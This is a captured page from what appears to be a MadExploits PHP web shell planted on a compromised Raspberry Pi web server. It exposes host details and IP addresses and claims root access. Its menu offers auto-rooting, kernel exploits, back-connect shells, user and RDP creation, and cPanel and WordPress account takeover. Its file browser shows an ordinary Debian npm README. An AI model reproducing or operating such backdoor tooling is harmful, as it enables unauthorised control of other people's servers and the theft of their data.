Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
npm /
[ HOME SHELL ]
Name
Size
Permission
Action
cli
[ DIR ]
drwxr-xr-x
files
[ DIR ]
drwxr-xr-x
misc
[ DIR ]
drwxr-xr-x
spec
[ DIR ]
drwxr-xr-x
NEWS.Debian.gz
314
B
-rw-r--r--
README.Debian
1.14
KB
-rw-r--r--
README.html
8.52
KB
-rw-r--r--
TODO.Debian
134
B
-rw-r--r--
changelog.Debian.gz
4.54
KB
-rw-r--r--
changelog.gz
37.54
KB
-rw-r--r--
copyright
24.95
KB
-rw-r--r--
index.html
10.66
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.Debian
npm for Debian ============== nodejs Debian package provides /usr/bin/nodejs ---------------------------------------------- Modules installed by npm can ship executables. These executables depend on /usr/bin/node, which is provided by the nodejs-legacy Debian package. More information: /usr/share/doc/nodejs/README.Debian global mode npm --------------- When run in global mode, npm is configured like this : prefix=/usr/local globalconfig=/etc/npmrc globalignorefile=/etc/npmignore That means npm -g install mymodule will be installed in : /usr/local/lib/node_modules/ If mymodule installs executables, they go to : /usr/local/bin And man pages to /usr/local/share/man Please read npm-config(1), npm-folders(1) and npm-link(1) man pages. This global configuration is kept across a global self update of npm. It is not guaranteed it will stay like this, so it's safer to update npm debian package instead. do not confuse with /usr/lib/nodejs ----------------------------------- /usr/lib/nodejs directory is reserved for modules that are provided by a debian package. -- Jérémy Lal <kapouer@melix.org> Fri, 28 Jan 2011 00:33:28 +0200
Close